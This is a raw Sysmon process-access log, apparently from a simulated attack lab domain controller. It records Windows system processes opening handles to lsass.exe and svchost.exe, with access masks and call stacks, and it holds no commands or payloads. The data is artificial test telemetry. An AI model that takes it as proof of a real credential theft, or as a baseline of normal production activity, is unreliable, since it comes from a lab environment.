15:51:00.816{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.816{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.816{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.800{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.785{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1700-000000008801}1728C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.769{D28789B6-7C62-5FA1-0A00-000000008801}852952C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1700-000000008801}1728C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.769{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1700-000000008801}1728C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.769{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1700-000000008801}1728C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.769{D28789B6-7C62-5FA1-0A00-000000008801}8521188C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1700-000000008801}1728C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.769{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.769{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.769{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1600-000000008801}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1600-000000008801}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 